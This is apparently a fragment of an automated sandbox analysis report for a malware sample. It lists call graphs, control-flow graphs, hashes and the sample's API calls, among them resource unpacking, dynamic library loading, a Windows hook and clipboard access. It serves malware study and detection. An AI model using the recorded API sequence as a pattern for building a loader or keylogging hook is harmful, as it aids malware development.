56264->56122 56265->56086 56266->56090 56267->56104 56268->56216 56270->56220 56271->56222 56272->56223 56273->56229 56274->56237 56275->56233 56276->56238 56278 4017f3 56277->56278 56279 4017e9 EntryPoint 56277->56279 56280 401805 56278->56280 56281 4017fb EntryPoint 56278->56281 56279->56278 56282 401818 56280->56282 56283 40180e EntryPoint 56280->56283 56281->56280 56284 401844 56282->56284 56285 40183e 56282->56285 56294 40b783 72 API calls 4 library calls 56282->56294 56283->56282 56289 40186d MultiByteToWideChar 56284->56289 56290 40184e EntryPoint 56284->56290 56296 40b743 62 API calls 2 library calls 56284->56296 56295 40b6b5 62 API calls 2 library calls 56285->56295 56289->56244 56289->56245 56290->56284 56291 40182d 56291->56284 56292 401834 EntryPoint 56291->56292 56292->56285 56294->56291 56295->56284 56296->56284 56297->56264 55808 360b6b00 55809 360b6b08 55808->55809 55811 360b6b2b 55809->55811 55812 360b555c 55809->55812 55813 360b6b40 KiUserCallbackDispatcher 55812->55813 55815 360b6bae 55813->55815 55815->55809 55820 360b1c10 55821 360b1c78 CreateWindowExW 55820->55821 55823 360b1d34 55821->55823 56298 360b8f40 56300 360b8f84 SetWindowsHookExA 56298->56300 56301 360b8fca 56300->56301 56345 360b7550 56346 360b75aa OleGetClipboard 56345->56346 56347 360b75ea 56346->56347 56348 360b5970 DuplicateHandle 56349 360b5a06 56348->56349 55816 31b49638 55817 31b49678 FindCloseChangeNotification 55816->55817 55819 31b496a9 55817->55819 55824 31b498a8 55826 31b498ae 55824->55826 55825 31b4997b 55826->55825 55829 360b9790 55826->55829 55833 360b97a0 55826->55833 55830 360b97af 55829->55830 55837 360b80f4 55830->55837 55834 360b97af 55833->55834 55835 360b80f4 5 API calls 55834->55835 55836 360b97cf 55835->55836 55836->55826 55839 360b80ff 55837->55839 55841 360b819c 55839->55841 55840 360b9895 55840->55840 55842 360b81a7 55841->55842 55843 360b9ee9 55842->55843 55844 360b9f44 55842->55844 55848 360bb299 55842->55848 55853 360bb2a8 55842->55853 55843->55844 55858 361b4851 55843->55858 55844->55840 55849 360bb2c9 55848->55849 55850 360bb2ed 55849->55850 55862 360bb458 55849->55862 55866 360bb447 55849->55866 55850->55843 55854 360bb2c9 55853->55854 55855 360bb2ed 55854->55855 55856 360bb458 4 API calls 55854->55856 55857 360bb447 4 API calls 55854->55857 55855->55843 55856->55855 55857->55855 55859 361b4881 55858->55859 55860 361b4c60 WaitMessage 55859->55860 55861 361b490c 55859->55861 55860->55859 55863 360bb465 55862->55863 55864 360bb49e 55863->55864 55870 360b9c5c 55863->55870 55864->55850 55867 360bb455 55866->55867 55868 360bb49e 55867->55868 55869 360b9c5c 4 API calls 55867->55869 55868->55850 55869->55868 55871 360b9c67 55870->55871 55873 360bb510 55871->55873 55874 360b9c90 55871->55874 55873->55873 55875 360b9c9b 55874->55875 55881 360b9ca0 55875->55881 55877 360bb97f 55885 361b01a0 55877->55885 55890 361b01b8 55877->55890 55878 360bb9b9 55878->55873 55884 360b9cab 55881->55884 55882 360bc800 55882->55877 55883 360bb2a8 4 API calls 55883->55882 55884->55882 55884->55883 55886 361b01ab 55885->55886 55887 361b01f5 55886->55887 55895 361b0428 55886->55895 55898 361b0430 55886->55898 55887->55878 55891 361b01c3 55890->55891 55892 361b01f5 55891->55892 55893 361b0428 4 API calls 55891->55893 55894 361b0430 4 API calls 55891->55894 55892->55878 55893->55892 55894->55892 55896 361b043a 55895->55896 55901 361b0460 55895->55901 55896->55887 55900 361b0460 4 API calls 55898->55900 55899 361b043a 55899->55887 55900->55899 55902 361b0463 55901->55902 55905 361b04a4 55902->55905 55911 360b14da GetModuleHandleW 55902->55911 55912 360b14e0 GetModuleHandleW 55902->55912 55903 361b048c 55903->55905 55908 361b06b8 LoadLibraryExW 55903->55908 55909 361b0660 LoadLibraryExW LoadLibraryExW 55903->55909 55910 361b0460 GetModuleHandleW GetModuleHandleW LoadLibraryExW LoadLibraryExW 55903->55910 55904 361b049c 55904->55905 55906 361b06b8 LoadLibraryExW 55904->55906 55907 361b06c0 LoadLibraryExW 55904->55907 55905->55896 55906->55905 55907->55905 55908->55904 55909->55904 55910->55904 55911->55903 55912->55903 56350 35562028 56351 35562032 56350->56351 56352 3556204c 56351->56352 56359 35c09758 56351->56359 56364 35c0974a 56351->56364 56353 35562092 56352->56353 56369 35c0b289 56352->56369 56354 355620a8 56353->56354 56373 35c0ef94 56353->56373 56360 35c0976d 56359->56360 56361 35c0997e 56360->56361 56362 35c09db5 GlobalMemoryStatusEx 56360->56362 56363 35c09da6 GlobalMemoryStatusEx 56360->56363 56361->56352 56362->56360 56363->56360 56365 35c0976d 56364->56365 56366 35c0997e 56365->56366 56367 35c09db5 GlobalMemoryStatusEx 56365->56367 56368 35c09da6 GlobalMemoryStatusEx 56365->56368 56366->56352 56367->56365 56368->56365 56370 35c0b294 56369->56370 56371 35c09758 GlobalMemoryStatusEx 56370->56371 56372 35c0b29b 56371->56372 56372->56353 56374 35c0ef9f 56373->56374 56375 35c09758 GlobalMemoryStatusEx 56374->56375 56376 35c0efa6 56375->56376 56376->56354

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 FindCloseChangeNotification GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 21 401c98-401c9a 16->21 19 401c7d-401c83 17->19 20 401c8f-401c91 17->20 19->16 25 401c85-401c8d 19->25 20->21 22 401cb0-401cce call 401650 21->22 23 401c9c-401caf CloseHandle 21->23 32 401cd0-401cd4 22->32 25->14 25->20 31 401ef3-401f1a call 401300 SizeofResource 27->31 28->31 38 401f1c-401f2f 31->38 39 401f5f-401f69 31->39 35 401cf0-401cf2 32->35 36 401cd6-401cd8 32->36 42 401cf5-401cf7 35->42 40 401cda-401ce0 36->40 41 401cec-401cee 36->41 43 401f33-401f5d call 401560 38->43 44 401f73-401f75 39->44 45 401f6b-401f72 39->45 40->35 46 401ce2-401cea 40->46 41->42 42->23 47 401cf9-401d09 Module32Next 42->47 43->39 49 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 44->49 50 401f77-401f8d call 401560 44->50 45->44 46->32 46->41 47->7 51 401d0f 47->51 49->5 86 4021aa-4021c0 49->86 50->49 55 401d10-401d2e call 401650 51->55 60 401d30-401d34 55->60 62 401d50-401d52 60->62 63 401d36-401d38 60->63 67 401d55-401d57 62->67 65 401d3a-401d40 63->65 66 401d4c-401d4e 63->66 65->62 70 401d42-401d4a 65->70 66->67 67->23 71 401d5d-401d7b call 401650 67->71 70->60 70->66 77 401d80-401d84 71->77 79 401da0-401da2 77->79 80 401d86-401d88 77->80 81 401da5-401da7 79->81 83 401d8a-401d90 80->83 84 401d9c-401d9e 80->84 81->23 85 401dad-401dbd Module32Next 81->85 83->79 87 401d92-401d9a 83->87 84->81 85->7 85->55 89 4021c6-4021ca 86->89 90 40246a-402470 86->90 87->77 87->84 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 94 402482-402487 93->94 94->5 98->99 103 402243-402251 98->103 99->90 100 402461-402467 call 40b6b5 99->100 100->90 103->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 103->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 154 40234e call 3003d006 122->154 155 40234e call 3003d01d 122->155 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 152 402390 call 3003d006 135->152 153 402390 call 3003d01d 135->153 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->138 153->138 154->127 155->127
                                                                                                                                            APIs
                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                            • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                                            • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                                                                                                                                            • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                                                                            • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                                                                            • FindCloseChangeNotification.KERNEL32(00000000), ref: 00401DC4
                                                                                                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                            • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                            • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                            • _memset.LIBCMT ref: 00401EDD
                                                                                                                                            • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1851440244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.1851440244.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_srcngmlC.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                            • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                            • API String ID: 2366190142-2962942730
                                                                                                                                            • Opcode ID: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                                                                                                                                            • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                            • Opcode Fuzzy Hash: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                                                                                                                                            • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1306 3556caa0-3556cac1 1307 3556cac3-3556cac6 1306->1307 1308 3556cacc-3556caeb 1307->1308 1309 3556d26b-3556d26e 1307->1309 1318 3556cb04-3556cb0e 1308->1318 1319 3556caed-3556caf0 1308->1319 1310 3556d294-3556d296 1309->1310 1311 3556d270-3556d28f 1309->1311 1313 3556d29d-3556d2a0 1310->1313 1314 3556d298 1310->1314 1311->1310 1313->1307 1315 3556d2a6-3556d2af 1313->1315 1314->1313 1323 3556cb14-3556cb25 call 35565838 1318->1323 1319->1318 1321 3556caf2-3556cb02 1319->1321 1321->1323 1326 3556cb2a-3556cb2f 1323->1326 1327 3556cb31-3556cb37 1326->1327 1328 3556cb3c-3556ce19 1326->1328 1327->1315 1349 3556ce1f-3556cece 1328->1349 1350 3556d25d-3556d26a 1328->1350 1359 3556cef7 1349->1359 1360 3556ced0-3556cef5 1349->1360 1362 3556cf00-3556cf13 call 35565844 1359->1362 1360->1362 1365 3556d244-3556d250 1362->1365 1366 3556cf19-3556cf3b call 35565850 1362->1366 1365->1349 1367 3556d256 1365->1367 1366->1365 1370 3556cf41-3556cf4b 1366->1370 1367->1350 1370->1365 1371 3556cf51-3556cf5c 1370->1371 1371->1365 1372 3556cf62-3556d038 1371->1372 1384 3556d046-3556d076 1372->1384 1385 3556d03a-3556d03c 1372->1385 1389 3556d084-3556d090 1384->1389 1390 3556d078-3556d07a 1384->1390 1385->1384 1391 3556d092-3556d096 1389->1391 1392 3556d0f0-3556d0f4 1389->1392 1390->1389 1391->1392 1393 3556d098-3556d0c2 1391->1393 1394 3556d235-3556d23e 1392->1394 1395 3556d0fa-3556d136 1392->1395 1402 3556d0c4-3556d0c6 1393->1402 1403 3556d0d0-3556d0ed call 3556585c 1393->1403 1394->1365 1394->1372 1406 3556d144-3556d152 1395->1406 1407 3556d138-3556d13a 1395->1407 1402->1403 1403->1392 1410 3556d154-3556d15f 1406->1410 1411 3556d169-3556d174 1406->1411 1407->1406 1410->1411 1414 3556d161 1410->1414 1415 3556d176-3556d17c 1411->1415 1416 3556d18c-3556d19d 1411->1416 1414->1411 1417 3556d180-3556d182 1415->1417 1418 3556d17e 1415->1418 1420 3556d1b5-3556d1c1 1416->1420 1421 3556d19f-3556d1a5 1416->1421 1417->1416 1418->1416 1425 3556d1c3-3556d1c9 1420->1425 1426 3556d1d9-3556d22e 1420->1426 1422 3556d1a7 1421->1422 1423 3556d1a9-3556d1ab 1421->1423 1422->1420 1423->1420 1427 3556d1cd-3556d1cf 1425->1427 1428 3556d1cb 1425->1428 1426->1394 1427->1426 1428->1426
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @?T5$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                            • API String ID: 0-3329914070
                                                                                                                                            • Opcode ID: 8ac61fdce70875965b3bed8643b08dc275f9f5595c9e6598771483dab7fba399
                                                                                                                                            • Instruction ID: 8d8b2ab9681e453056fc2a91adc177f6e32ad8e987651b54bc705107516aa75d
                                                                                                                                            • Opcode Fuzzy Hash: 8ac61fdce70875965b3bed8643b08dc275f9f5595c9e6598771483dab7fba399
                                                                                                                                            • Instruction Fuzzy Hash: DD324131E1075A8BCB14DF74C89499DF7B2BFC9304F5196AAD409BB214EF70A986CB81
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @?T5$@?T5$XtT5
                                                                                                                                            • API String ID: 0-1892399281
                                                                                                                                            • Opcode ID: 1c1775721860f72d9e77376cb4a8fc0a593e159681ac7cf688da6d8923d27a7e
                                                                                                                                            • Instruction ID: ac1da4a2626476a8d4682a18a4e3b16fc07b2ad939ad6a0a9361e8066cbf3ee2
                                                                                                                                            • Opcode Fuzzy Hash: 1c1775721860f72d9e77376cb4a8fc0a593e159681ac7cf688da6d8923d27a7e
                                                                                                                                            • Instruction Fuzzy Hash: B7926C78A10244CFD724DB64C188A5DB7B2FF49359F5095AAE40AEB351DB35EC82CF80
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1881434210.00000000361B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 361B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_361b0000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: <0T5
                                                                                                                                            • API String ID: 0-934683110
                                                                                                                                            • Opcode ID: 26f8199dd831af08af4d9124b41e988a4cb0c5aa552c80094e423f827365cc87
                                                                                                                                            • Instruction ID: 5c8edd8c551f527dce96571737a4b63332b2df22901067cd72136fbafbf8bfa5
                                                                                                                                            • Opcode Fuzzy Hash: 26f8199dd831af08af4d9124b41e988a4cb0c5aa552c80094e423f827365cc87
                                                                                                                                            • Instruction Fuzzy Hash: 77D14B74A002198FEB04CFA5C984B9DBBF2BF88304F15C558E509AB2A9DB70E945DB91
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @?T5$XtT5
                                                                                                                                            • API String ID: 0-104808372
                                                                                                                                            • Opcode ID: f29dc1ce815c13fcbaf36c60af07b49600bac4080c494ae6ba236abbd362b37b
                                                                                                                                            • Instruction ID: 64e2de3ab5ca59663c3cee225853ad1b3bdaa45c507d2d2a88fb71033cf37020
                                                                                                                                            • Opcode Fuzzy Hash: f29dc1ce815c13fcbaf36c60af07b49600bac4080c494ae6ba236abbd362b37b
                                                                                                                                            • Instruction Fuzzy Hash: 3E02D578B002458FDB05DF68D994A9EBBB2FF89314F548466E406EB391DB30EC42CB91
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: XPcq$\Ocq
                                                                                                                                            • API String ID: 0-2802517751
                                                                                                                                            • Opcode ID: 74c19c07b15398c356ba5d3a625e5b2516fbbe2c6d521be41529da1c73b36cd0
                                                                                                                                            • Instruction ID: dd88209de8cefa7ce874eb7c09f9efc588c889fa5277424f685319827a00943e
                                                                                                                                            • Opcode Fuzzy Hash: 74c19c07b15398c356ba5d3a625e5b2516fbbe2c6d521be41529da1c73b36cd0
                                                                                                                                            • Instruction Fuzzy Hash: 4CE1E235F001548FEB04DB68D480A9EBBE2FF89354F2594AAE40ADB359DB31EC05CB91
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: cc276e062b7670b618b89d595425d5a2109f29b3b97f01f12d48134d231a5446
                                                                                                                                            • Instruction ID: 472f88e1d398139e51cbe3c7adf339c7f1d8d159e923db3d159633f22f131cb9
                                                                                                                                            • Opcode Fuzzy Hash: cc276e062b7670b618b89d595425d5a2109f29b3b97f01f12d48134d231a5446
                                                                                                                                            • Instruction Fuzzy Hash: 95530631D10B5A8ADB51EF68C880599F7B1FF99300F11D79AE4587B221FB70AAC5CB81
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d72daff9dd21f47916922c27d07f62a643c9ae77cf0ba52fa4ed6091af7ab656
                                                                                                                                            • Instruction ID: b8976d3dd4490af049a3c66e2ff7aae2ae3a3f081b4191dfd645d2923e000302
                                                                                                                                            • Opcode Fuzzy Hash: d72daff9dd21f47916922c27d07f62a643c9ae77cf0ba52fa4ed6091af7ab656
                                                                                                                                            • Instruction Fuzzy Hash: 32232D31D10B598EDB11DF68C880A9DF7B1FF99304F10D79AE459A7221EB70AAC5CB81
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: db0b53f04f0d9fcf48119b131638fcefbb1cd6182edce4884139b7584a7b504c
                                                                                                                                            • Instruction ID: 0692fbc530c48c9d1dadf155caa04a5492e731f42e9cb63cbaa05eca5805b8cf
                                                                                                                                            • Opcode Fuzzy Hash: db0b53f04f0d9fcf48119b131638fcefbb1cd6182edce4884139b7584a7b504c
                                                                                                                                            • Instruction Fuzzy Hash: 8B231B31D10B598EDB11EF68C880A9DF7B1FF99304F10D79AE449A7221EB70AAC5CB41
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a99130cdaae55b9a018c4d9829cf199324dc1a84d5a85ac0125003ae90cb33aa
                                                                                                                                            • Instruction ID: f95af83641abdbd0c2948621a988b65a8b37ae8b0e08edaf58a1987ea7073811
                                                                                                                                            • Opcode Fuzzy Hash: a99130cdaae55b9a018c4d9829cf199324dc1a84d5a85ac0125003ae90cb33aa
                                                                                                                                            • Instruction Fuzzy Hash: 3612D439F012559BEB14DB64C8C0A5EB7A2FF85358F108469E84AEB385DB35FC46CB81
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 156 355630b8-355630e3 157 355630e5-355630e8 156->157 158 3556314c-3556314f 157->158 159 355630ea-35563147 157->159 160 355631b3-355631b6 158->160 161 35563151-355631ae 158->161 159->158 163 3556321a-3556321d 160->163 164 355631b8-35563215 160->164 161->160 166 35563281-35563284 163->166 167 3556321f-3556327c 163->167 164->163 168 35563286-355632e3 166->168 169 355632e8-355632eb 166->169 167->166 168->169 174 3556334f-35563352 169->174 175 355632ed-3556334a 169->175 178 355633b6-355633b9 174->178 179 35563354-355633b1 174->179 175->174 183 3556341d-35563420 178->183 184 355633bb-35563418 178->184 179->178 187 35563422-35563476 183->187 188 3556347b-3556347e 183->188 184->183 187->188 196 355634d0-355634d3 188->196 197 35563480-355634cb 188->197 201 35563525-35563528 196->201 202 355634d5-35563520 196->202 197->196 207 3556357a-3556357d 201->207 208 3556352a-35563575 201->208 202->201 213 355635cf-355635d2 207->213 214 3556357f-355635ca 207->214 208->207 224 35563624-35563627 213->224 225 355635d4-3556361f 213->225 214->213 229 35563679-3556367c 224->229 230 35563629-35563674 224->230 225->224 235 355636ce-355636d1 229->235 236 3556367e-355636c9 229->236 230->229 241 35563723-35563726 235->241 242 355636d3-3556371e 235->242 236->235 252 35563778-3556377b 241->252 253 35563728-35563773 241->253 242->241 257 355637cd-355637d0 252->257 258 3556377d-355637c8 252->258 253->252 263 355637d2-35563826 257->263 264 3556382b-3556382e 257->264 258->257 263->264 269 35563892-35563895 264->269 270 35563830-3556388d 264->270 280 35563897-355638f4 269->280 281 355638f9-355638fc 269->281 270->269 280->281 285 35563960-35563963 281->285 286 355638fe-3556395b 281->286 291 355639c7-355639ca 285->291 292 35563965-355639c2 285->292 286->285 297 35563a2e-35563a31 291->297 298 355639cc-35563a29 291->298 292->291 308 35563a33-35563a8a 297->308 309 35563a8f-35563a92 297->309 298->297 308->309 313 35563a94-35563ae5 309->313 314 35563aea-35563aed 309->314 313->314 319 35563b45-35563b48 314->319 320 35563aef-35563b40 314->320 325 35563ba0-35563ba3 319->325 326 35563b4a-35563b9b 319->326 320->319 336 35563ba5-35563bf6 325->336 337 35563bfb-35563bfe 325->337 326->325 336->337 341 35563c56-35563c59 337->341 342 35563c00-35563c51 337->342 347 35563cb1-35563cb4 341->347 348 35563c5b-35563cac 341->348 342->341 353 35563cb6-35563d07 347->353 354 35563d0c-35563d0f 347->354 348->347 353->354 364 35563d67-35563d6a 354->364 365 35563d11-35563d62 354->365 369 35563dc2-35563dc5 364->369 370 35563d6c-35563dbd 364->370 365->364 375 35563dc7-35563e18 369->375 376 35563e1d-35563e20 369->376 370->369 375->376 381 35563e22-35563e65 376->381 382 35563e7e-35563e81 376->382 436 35563e6d-35563e79 381->436 387 35563e83-35563ed4 382->387 388 35563ed9-35563edc 382->388 387->388 397 35563f34-35563f37 388->397 398 35563ede-35563f2f 388->398 404 35563f8f-35563f91 397->404 405 35563f39-35563f8a 397->405 398->397 410 35563f93 404->410 411 35563f98-35563f9b 404->411 405->404 410->411 411->157 417 35563fa1-35563fa8 411->417 436->382
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: <dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5$<dT5
                                                                                                                                            • API String ID: 0-1278165183
                                                                                                                                            • Opcode ID: f15e5b8081f9def668bea812c2559dc0a25390b03230725ec00119ea9faf1adb
                                                                                                                                            • Instruction ID: c2956d2e92387737a86590871de43139ec30dce027471fe7dda96c7c08307b1f
                                                                                                                                            • Opcode Fuzzy Hash: f15e5b8081f9def668bea812c2559dc0a25390b03230725ec00119ea9faf1adb
                                                                                                                                            • Instruction Fuzzy Hash: D8823BB8B422148FD715DB24C5A0A2DB7B7FB89704F50896AD809A7354DF31AD83CBE1
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
